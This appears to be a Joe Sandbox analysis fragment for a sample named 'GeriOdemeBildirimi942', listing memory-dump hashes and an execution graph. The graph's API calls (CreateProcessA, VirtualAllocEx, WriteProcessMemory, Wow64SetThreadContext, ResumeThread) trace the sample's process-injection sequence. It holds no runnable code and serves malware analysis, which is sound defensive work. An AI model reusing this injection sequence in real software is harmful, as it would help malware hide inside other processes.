                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52ad162c9ea7e08d7eb6f6647f83a098dc71c53f678ee06c1daee6c86f318418
                                                              • Instruction ID: e2f2f0c72e289be13034d0f8031fe7c39cd8bcf7a4f5146bfa7ba121ccb5c96d
                                                              • Opcode Fuzzy Hash: 52ad162c9ea7e08d7eb6f6647f83a098dc71c53f678ee06c1daee6c86f318418
                                                              • Instruction Fuzzy Hash: 16C1A274E00218CFEB14DFA9C944BADBBB2BF89300F1481A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07ea35cb512aac58510f545e18d157fbc669b339912386b1fd85241d4456fdcb
                                                              • Instruction ID: f6f7d90740c064fa1d41d40a7b2c68088c135d2db483fc271dabc293c2203205
                                                              • Opcode Fuzzy Hash: 07ea35cb512aac58510f545e18d157fbc669b339912386b1fd85241d4456fdcb
                                                              • Instruction Fuzzy Hash: 76C1A174E00218CFEB54DFA9C954BADBBB2BF89304F1080A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df0dc17b6ebda38ccb73afafb025ae4873deeff1125982effbc170f733b4867e
                                                              • Instruction ID: 140972fbb3ced675f2b2a2bbc96c0d1e2a3408ad6cfa6cd1ab5ab9ef718623e7
                                                              • Opcode Fuzzy Hash: df0dc17b6ebda38ccb73afafb025ae4873deeff1125982effbc170f733b4867e
                                                              • Instruction Fuzzy Hash: 25C19074E00218CFEB14DFA9C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1107636a12bf1e5863e94c0e3d9abe0ec6ea3267ac3064e311780050d880cc1c
                                                              • Instruction ID: df4e603412d7f68ec4793bc09bbb8d26b089c1f96b1418ebc10de607d1f9d0f4
                                                              • Opcode Fuzzy Hash: 1107636a12bf1e5863e94c0e3d9abe0ec6ea3267ac3064e311780050d880cc1c
                                                              • Instruction Fuzzy Hash: 81C19174E00218CFEB14DFA9C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84dacd6a870094f3d6b7874d34291ebcac7fcd3a058b9fa71ed8f7cbb06200a2
                                                              • Instruction ID: b16af315f85ffe8cf8c697d368479621600de3b208e878fb67df706b8fb0c080
                                                              • Opcode Fuzzy Hash: 84dacd6a870094f3d6b7874d34291ebcac7fcd3a058b9fa71ed8f7cbb06200a2
                                                              • Instruction Fuzzy Hash: 9CC19474E00218CFEB24DFA5C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6b3b34726032083b644c06c699f54bc1c8c11e4b440ed5afc0bec49fb42daf
                                                              • Instruction ID: 73c0ef12421778ee9ea41b4e08473d0b45fb7a6a8121e29c4982b96f40ff642c
                                                              • Opcode Fuzzy Hash: bf6b3b34726032083b644c06c699f54bc1c8c11e4b440ed5afc0bec49fb42daf
                                                              • Instruction Fuzzy Hash: CAC19274E00218CFEB14DFA9C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e03c267bec9239692f956593a8b0dead0f230e1cef1fbe03a307407a3c9ac6ee
                                                              • Instruction ID: c248d09e999f896365ae74b82668fded26d0b9ff8439a801c7482c57d1706036
                                                              • Opcode Fuzzy Hash: e03c267bec9239692f956593a8b0dead0f230e1cef1fbe03a307407a3c9ac6ee
                                                              • Instruction Fuzzy Hash: 8EC1A374E00218CFEB64DFA5C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26395b29f244dc7740e40827f04375a23017ea83495d6bdbf876eae103f12cde
                                                              • Instruction ID: 1cf5c735256f9f968c8523af436e3fbd263ee0587b356ae3523d9446bea1b11a
                                                              • Opcode Fuzzy Hash: 26395b29f244dc7740e40827f04375a23017ea83495d6bdbf876eae103f12cde
                                                              • Instruction Fuzzy Hash: 7DC19374E00218CFEB14DFA5C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 164362735aea6f2609b429bfda8643a6f19170bd3ce254bb851a323e52b76760
                                                              • Instruction ID: 4231268c1e37da1a6ffff24113ecf3dd5077867dddd9dd068d2fbca3ac46b29e
                                                              • Opcode Fuzzy Hash: 164362735aea6f2609b429bfda8643a6f19170bd3ce254bb851a323e52b76760
                                                              • Instruction Fuzzy Hash: 5EC18E74E00218CFEB14DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85DF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4ca9abcf184b86bda8e74f3ea323501891d16e0ba73fe4e744432c99f9a7106
                                                              • Instruction ID: bb8b04a6ba81d134c9c40e65cf2555f6d271ed0490d54b275f22ada47556dff5
                                                              • Opcode Fuzzy Hash: b4ca9abcf184b86bda8e74f3ea323501891d16e0ba73fe4e744432c99f9a7106
                                                              • Instruction Fuzzy Hash: 8DC19274E00218CFEB24DFA5C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab7bcee8622157f5ea9af05191c95ab4fce0cd545519e085664ebd71c1cf0f7b
                                                              • Instruction ID: 84c582d3577368914ca171d7ede653d64b0b6f1dc71c2a28fd93fa9ea670ada0
                                                              • Opcode Fuzzy Hash: ab7bcee8622157f5ea9af05191c95ab4fce0cd545519e085664ebd71c1cf0f7b
                                                              • Instruction Fuzzy Hash: B2C19374E00218CFEB64DFA5C944BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f0798e360a40f5da2923ae8e38a34d50c5f006cbc7269ab2c815a1c5f1ca9900
                                                              • Instruction ID: 88d51cddbbd2cf9cbb5dc0745c469dfae48b105b3850e84ee2c66732bc651470
                                                              • Opcode Fuzzy Hash: f0798e360a40f5da2923ae8e38a34d50c5f006cbc7269ab2c815a1c5f1ca9900
                                                              • Instruction Fuzzy Hash: 20C19E74E00218CFEB14DFA9C944BADBBB2BF89304F1080A9D809AB255DB359E85CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b71e57c1af3af776be1e3e681db29e87196ad81b24278d912b067c4b9414692
                                                              • Instruction ID: f753189b13ff2a884b7a3e4d6a7b5b352316be85a4635c09362a4a690e31b29a
                                                              • Opcode Fuzzy Hash: 1b71e57c1af3af776be1e3e681db29e87196ad81b24278d912b067c4b9414692
                                                              • Instruction Fuzzy Hash: 68C1A274E00218CFEB14DFA9C954BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e3834fe21d9ccc1dcb9b3fe098ce27e37acec0646c4e6e6c9ee2d92473e8b1c
                                                              • Instruction ID: b585a04720953c58d7b3a20162fa2ff5ee9d4ca2d6644fee7d4c05f4eab0e605
                                                              • Opcode Fuzzy Hash: 7e3834fe21d9ccc1dcb9b3fe098ce27e37acec0646c4e6e6c9ee2d92473e8b1c
                                                              • Instruction Fuzzy Hash: 80C19074E00218CFEB14DFA9C954BADBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d53caf86caac6bd3f4f6188b332a3a6c47e00a49332698739943acc88015cdcf
                                                              • Instruction ID: e6db177ce03e0321be0e39b15f0938dcc27cac95c65b9658c118444271b2276a
                                                              • Opcode Fuzzy Hash: d53caf86caac6bd3f4f6188b332a3a6c47e00a49332698739943acc88015cdcf
                                                              • Instruction Fuzzy Hash: B1C19274E00218CFEB54DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfae21bc4b6baae2b3de8ebb5c4156938169dfd29e917607d814844f73862077
                                                              • Instruction ID: d8a0e9b1353bd947f5001dc53b88d7b9ea5e5ce74f62c26717321515639265a8
                                                              • Opcode Fuzzy Hash: cfae21bc4b6baae2b3de8ebb5c4156938169dfd29e917607d814844f73862077
                                                              • Instruction Fuzzy Hash: E3C19274E00218CFEB14DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc1d1d5d77b09478e7f067200304f8ebe2c3eb6a00a71bf27a5b68c94d55af6d
                                                              • Instruction ID: b585ab61947a35ef61dbdb3fdd0a5b7832b44886f0a6f32263f1cf2dd7af9bda
                                                              • Opcode Fuzzy Hash: cc1d1d5d77b09478e7f067200304f8ebe2c3eb6a00a71bf27a5b68c94d55af6d
                                                              • Instruction Fuzzy Hash: 72C1A274E00218CFEB14DFA9C944BADBBB2BF89300F1081A9D809AB355DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6be49bc143f1e14090c733ce801364b5c0803b910cea265e757a175a6bdad90
                                                              • Instruction ID: 983d302075c7e911a520b6a201082cab418665495fedd29860cfa40027e187d8
                                                              • Opcode Fuzzy Hash: d6be49bc143f1e14090c733ce801364b5c0803b910cea265e757a175a6bdad90
                                                              • Instruction Fuzzy Hash: 85C18F74E00218CFEB14DFA9C944BADBBB2BF89304F1081A9D809AB355DB359E85DF51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a1736796466e27759299a1635e536abd9b9b5599d62f4f2ff3995637c5359f1
                                                              • Instruction ID: 149454a19388fa22784d12910ec650414dc5f171b074b1739a1d7d62d77ce13d
                                                              • Opcode Fuzzy Hash: 3a1736796466e27759299a1635e536abd9b9b5599d62f4f2ff3995637c5359f1
                                                              • Instruction Fuzzy Hash: F441ACB4D022189FDB04DFA8D594BAEBBF1BF49304F1455A9E815B7390E7389A40CF94
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3774066548.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_58a0000_GeriOdemeBildirimi942.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fec4d48f8261de2fbf4faa1a3fdeaf5684036b26a96d52da50a0f9ce9ab104d3
                                                              • Instruction ID: 11919f5ad1a4243bb28668d79e864438a71e2f0af5eb799ad00519ce4af6e53f
                                                              • Opcode Fuzzy Hash: fec4d48f8261de2fbf4faa1a3fdeaf5684036b26a96d52da50a0f9ce9ab104d3
                                                              • Instruction Fuzzy Hash: 3941AAB4D022189FDB04DFA8D594BAEBBF1BF49300F1455A9E815B7390E7389A40CF98

                                                              Execution Graph

                                                              Execution Coverage:10.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:327
                                                              Total number of Limit Nodes:17
                                                              execution_graph 37168 25ad01c 37169 25ad034 37168->37169 37170 25ad08e 37169->37170 37175 4e32813 37169->37175 37180 4e31aa8 37169->37180 37185 4e32818 37169->37185 37190 4e31a97 37169->37190 37176 4e32845 37175->37176 37177 4e32877 37176->37177 37195 4e329a0 37176->37195 37200 4e32990 37176->37200 37177->37177 37181 4e31ace 37180->37181 37183 4e32813 CallWindowProcW 37181->37183 37184 4e32818 CallWindowProcW 37181->37184 37182 4e31aef 37182->37170 37183->37182 37184->37182 37186 4e32845 37185->37186 37187 4e32877 37186->37187 37188 4e329a0 CallWindowProcW 37186->37188 37189 4e32990 CallWindowProcW 37186->37189 37187->37187 37188->37187 37189->37187 37191 4e31ace 37190->37191 37193 4e32813 CallWindowProcW 37191->37193 37194 4e32818 CallWindowProcW 37191->37194 37192 4e31aef 37192->37170 37193->37192 37194->37192 37197 4e329b4 37195->37197 37196 4e32a40 37196->37177 37205 4e32a53 37197->37205 37208 4e32a58 37197->37208 37202 4e329b4 37200->37202 37201 4e32a40 37201->37177 37203 4e32a53 CallWindowProcW 37202->37203 37204 4e32a58 CallWindowProcW 37202->37204 37203->37201 37204->37201 37206 4e32a69 37205->37206 37211 4e34011 37205->37211 37206->37196 37209 4e32a69 37208->37209 37210 4e34011 CallWindowProcW 37208->37210 37209->37196 37210->37209 37212 4e34028 37211->37212 37213 4e33fdc 37211->37213 37212->37206 37214 4e340da CallWindowProcW 37213->37214 37215 4e33fef 37213->37215 37214->37215 37215->37206 37216 267d060 37217 267d0a6 37216->37217 37221 267d643 37217->37221 37224 267d648 37217->37224 37218 267d193 37227 267d29c 37221->37227 37225 267d676 37224->37225 37226 267d29c DuplicateHandle 37224->37226 37225->37218 37226->37225 37228 267d6b0 DuplicateHandle 37227->37228 37229 267d676 37228->37229 37229->37218 37386 926a68c 37387 926a60b 37386->37387 37388 926a7f8 37387->37388 37392 926bea0 37387->37392 37409 926be61 37387->37409 37428 926be90 37387->37428 37393 926beba 37392->37393 37445 926c6db 37393->37445 37452 926c99b 37393->37452 37457 926c67c 37393->37457 37462 926c95e 37393->37462 37467 926c354 37393->37467 37471 926c436 37393->37471 37480 926c92b 37393->37480 37485 926c3aa 37393->37485 37490 926c58a 37393->37490 37496 926cced 37393->37496 37501 926c52c 37393->37501 37506 926c3cf 37393->37506 37515 926c5ce 37393->37515 37522 926c480 37393->37522 37394 926bede 37394->37388 37410 926be25 37409->37410 37412 926be6a 37409->37412 37410->37388 37411 926be6e 37411->37388 37412->37411 37414 926c480 2 API calls 37412->37414 37415 926c5ce 2 API calls 37412->37415 37416 926c3cf 4 API calls 37412->37416 37417 926c52c 2 API calls 37412->37417 37418 926cced 2 API calls 37412->37418 37419 926c58a 2 API calls 37412->37419 37420 926c3aa 2 API calls 37412->37420 37421 926c92b 2 API calls 37412->37421 37422 926c436 4 API calls 37412->37422 37423 926c354 2 API calls 37412->37423 37424 926c95e 2 API calls 37412->37424 37425 926c67c 2 API calls 37412->37425 37426 926c99b 2 API calls 37412->37426 37427 926c6db 4 API calls 37412->37427 37413 926bede 37413->37388 37414->37413 37415->37413 37416->37413 37417->37413 37418->37413 37419->37413 37420->37413 37421->37413 37422->37413 37423->37413 37424->37413 37425->37413 37426->37413 37427->37413 37429 926beba 37428->37429 37431 926c480 2 API calls 37429->37431 37432 926c5ce 2 API calls 37429->37432 37433 926c3cf 4 API calls 37429->37433 37434 926c52c 2 API calls 37429->37434 37435 926cced 2 API calls 37429->37435 37436 926c58a 2 API calls 37429->37436 37437 926c3aa 2 API calls 37429->37437 37438 926c92b 2 API calls 37429->37438 37439 926c436 4 API calls 37429->37439 37440 926c354 2 API calls 37429->37440 37441 926c95e 2 API calls 37429->37441 37442 926c67c 2 API calls 37429->37442 37443 926c99b 2 API calls 37429->37443 37444 926c6db 4 API calls 37429->37444 37430 926bede 37430->37388 37431->37430 37432->37430 37433->37430 37434->37430 37435->37430 37436->37430 37437->37430 37438->37430 37439->37430 37440->37430 37441->37430 37442->37430 37443->37430 37444->37430 37527 9269e90 37445->37527 37531 9269e8d 37445->37531 37446 926c3b6 37447 926c2a9 37446->37447 37535 9269f50 37446->37535 37539 9269f49 37446->37539 37447->37394 37453 926c99f 37452->37453 37543 92698c8 37453->37543 37547 92698d0 37453->37547 37454 926c9cb 37458 926c3b6 37457->37458 37459 926c2a9 37458->37459 37460 9269f50 WriteProcessMemory 37458->37460 37461 9269f49 WriteProcessMemory 37458->37461 37459->37394 37460->37458 37461->37458 37463 926c92c 37462->37463 37465 92698d0 ResumeThread 37463->37465 37466 92698c8 ResumeThread 37463->37466 37464 926c9cb 37465->37464 37466->37464 37551 926a1cc 37467->37551 37555 926a1d8 37467->37555 37473 926c3d8 37471->37473 37472 926c440 37472->37394 37473->37471 37473->37472 37474 926c3b6 37473->37474 37559 926d030 37473->37559 37564 926d02d 37473->37564 37475 926c2a9 37474->37475 37478 9269f50 WriteProcessMemory 37474->37478 37479 9269f49 WriteProcessMemory 37474->37479 37475->37394 37478->37474 37479->37474 37481 926c92c 37480->37481 37483 92698d0 ResumeThread 37481->37483 37484 92698c8 ResumeThread 37481->37484 37482 926c9cb 37483->37482 37484->37482 37486 926c3b6 37485->37486 37487 926c2a9 37486->37487 37488 9269f50 WriteProcessMemory 37486->37488 37489 9269f49 WriteProcessMemory 37486->37489 37487->37394 37488->37486 37489->37486 37491 926c829 37490->37491 37492 926cc2a 37491->37492 37494 92698d0 ResumeThread 37491->37494 37495 92698c8 ResumeThread 37491->37495 37492->37394 37493 926c9cb 37494->37493 37495->37493 37497 926cd08 37496->37497 37577 926a040 37497->37577 37581 926a038 37497->37581 37498 926cd2b 37502 926cb48 37501->37502 37504 9269980 Wow64SetThreadContext 37502->37504 37505 926997b Wow64SetThreadContext 37502->37505 37503 926cb63 37504->37503 37505->37503 37507 926c3d8 37506->37507 37508 926c3b6 37507->37508 37510 926c440 37507->37510 37511 926d030 2 API calls 37507->37511 37512 926d02d 2 API calls 37507->37512 37509 926c2a9 37508->37509 37513 9269f50 WriteProcessMemory 37508->37513 37514 9269f49 WriteProcessMemory 37508->37514 37509->37394 37510->37394 37511->37507 37512->37507 37513->37508 37514->37508 37520 9269f50 WriteProcessMemory 37515->37520 37521 9269f49 WriteProcessMemory 37515->37521 37516 926c3b6 37517 926c2a9 37516->37517 37518 9269f50 WriteProcessMemory 37516->37518 37519 9269f49 WriteProcessMemory 37516->37519 37517->37394 37518->37516 37519->37516 37520->37516 37521->37516 37523 926c48c 37522->37523 37525 9269f50 WriteProcessMemory 37523->37525 37526 9269f49 WriteProcessMemory 37523->37526 37524 926cc8e 37525->37524 37526->37524 37528 9269ed0 VirtualAllocEx 37527->37528 37530 9269f0d 37528->37530 37530->37446 37532 9269ed0 VirtualAllocEx 37531->37532 37534 9269f0d 37532->37534 37534->37446 37536 9269f98 WriteProcessMemory 37535->37536 37538 9269fef 37536->37538 37538->37446 37540 9269f98 WriteProcessMemory 37539->37540 37542 9269fef 37540->37542 37542->37446 37544 9269910 ResumeThread 37543->37544 37546 9269941 37544->37546 37546->37454 37548 9269910 ResumeThread 37547->37548 37550 9269941 37548->37550 37550->37454 37552 926a261 CreateProcessA 37551->37552 37554 926a423 37552->37554 37554->37554 37556 926a261 CreateProcessA 37555->37556 37558 926a423 37556->37558 37560 926d045 37559->37560 37569 9269980 37560->37569 37573 926997b 37560->37573 37561 926d05b 37561->37473 37565 926d045 37564->37565 37567 9269980 Wow64SetThreadContext 37565->37567 37568 926997b Wow64SetThreadContext 37565->37568 37566 926d05b 37566->37473 37567->37566 37568->37566 37570 92699c5 Wow64SetThreadContext 37569->37570 37572 9269a0d 37570->37572 37572->37561 37574 92699c5 Wow64SetThreadContext 37573->37574 37576 9269a0d 37574->37576 37576->37561 37578 926a08b ReadProcessMemory 37577->37578 37580 926a0cf 37578->37580 37580->37498 37582 926a08b ReadProcessMemory 37581->37582 37584 926a0cf 37582->37584 37584->37498 37230 4e36fe8 37231 4e37015 37230->37231 37242 4e36d24 37231->37242 37233 4e37085 37234 4e36d24 3 API calls 37233->37234 37235 4e370b7 37234->37235 37248 4e36d34 37235->37248 37238 4e36d34 3 API calls 37239 4e3711b 37238->37239 37252 4e36d44 37239->37252 37241 4e3714d 37243 4e36d2f 37242->37243 37256 2678304 37243->37256 37260 2678328 37243->37260 37264 2675cc4 37243->37264 37244 4e37fdb 37244->37233 37249 4e36d3f 37248->37249 37324 4e36f44 37249->37324 37251 4e370e9 37251->37238 37253 4e36d4f 37252->37253 37330 4e3ec80 37253->37330 37255 4e3fb77 37255->37241 37258 26782fa 37256->37258 37257 2678629 37257->37244 37258->37256 37258->37257 37268 267cd98 37258->37268 37262 26782fa 37260->37262 37261 2678629 37261->37244 37262->37260 37262->37261 37263 267cd98 3 API calls 37262->37263 37263->37261 37266 2675ccf 37264->37266 37265 2678629 37265->37244 37266->37265 37267 267cd98 3 API calls 37266->37267 37267->37265 37270 267cdb9 37268->37270 37269 267cddd 37269->37257 37270->37269 37272 267cf48 37270->37272 37274 267cf55 37272->37274 37273 267cf8f 37273->37269 37274->37273 37276 267bb00 37274->37276 37277 267bb0b 37276->37277 37278 267dca8 37277->37278 37280 267d2fc 37277->37280 37281 267d307 37280->37281 37282 2675cc4 3 API calls 37281->37282 37283 267dd17 37282->37283 37286 267faa8 37283->37286 37284 267dd51 37284->37278 37288 267fbd9 37286->37288 37289 267fad9 37286->37289 37287 267fae5 37287->37284 37288->37284 37289->37287 37292 4e309c0 37289->37292 37297 4e309bb 37289->37297 37293 4e309eb 37292->37293 37294 4e30a9a 37293->37294 37302 4e3185b 37293->37302 37311 4e318a0 37293->37311 37298 4e309eb 37297->37298 37299 4e30a9a 37298->37299 37300 4e318a0 3 API calls 37298->37300 37301 4e3185b 3 API calls 37298->37301 37300->37299 37301->37299 37303 4e318a9 37302->37303 37304 4e318dd CreateWindowExW 37302->37304 37305 4e318d5 37303->37305 37310 4e3185b 2 API calls 37303->37310 37316 4e318f0 37303->37316 37320 4e318e4 37303->37320 37307 4e31a14 37304->37307 37305->37294 37307->37307 37310->37305 37313 4e318f0 CreateWindowExW 37311->37313 37314 4e318e4 CreateWindowExW 37311->37314 37315 4e3185b 3 API calls 37311->37315 37312 4e318d5 37312->37294 37313->37312 37314->37312 37315->37312 37317 4e31958 CreateWindowExW 37316->37317 37319 4e31a14 37317->37319 37321 4e31958 CreateWindowExW 37320->37321 37323 4e31a14 37321->37323 37323->37323 37325 4e36f4f 37324->37325 37326 4e38e82 37325->37326 37327 2678304 3 API calls 37325->37327 37328 2675cc4 3 API calls 37325->37328 37329 2678328 3 API calls 37325->37329 37326->37251 37327->37326 37328->37326 37329->37326 37331 4e3ec8b 37330->37331 37333 2678304 3 API calls 37331->37333 37334 2675cc4 3 API calls 37331->37334 37335 2678328 3 API calls 37331->37335 37332 4e3fbfc 37332->37255 37333->37332 37334->37332 37335->37332 37375 926d0b8 37376 926d243 37375->37376 37378 926d0de 37375->37378 37378->37376 37379 926b5a8 37378->37379 37380 926d338 PostMessageW 37379->37380 37381 926d3a4 37380->37381 37381->37378 37336 2674668 37337 267467a 37336->37337 37338 2674686 37337->37338 37342 2674783 37337->37342 37347 2673e28 37338->37347 37340 26746a5 37343 267479d 37342->37343 37351 2674883 37343->37351 37355 2674888 37343->37355 37344 26747a7 37344->37338 37348 2673e33 37347->37348 37363 2675c44 37348->37363 37350 267705c 37350->37340 37353 26748af 37351->37353 37352 267498c 37352->37344 37353->37352 37359 26744b0 37353->37359 37357 26748af 37355->37357 37356 267498c 37356->37344 37357->37356 37358 26744b0 CreateActCtxA 37357->37358 37358->37356 37360 2675918 CreateActCtxA 37359->37360 37362 26759db 37360->37362 37362->37362 37364 2675c4f 37363->37364 37367 2675c64 37364->37367 37366 2677105 37366->37350 37368 2675c6f 37367->37368 37371 2675c94 37368->37371 37370 26771e2 37370->37366 37372 2675c9f 37371->37372 37373 2675cc4 3 API calls 37372->37373 37374 26772e5 37373->37374 37374->37370 37382 267afb8 37383 267b000 GetModuleHandleW 37382->37383 37384 267affa 37382->37384 37385 267b02d 37383->37385 37384->37383

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
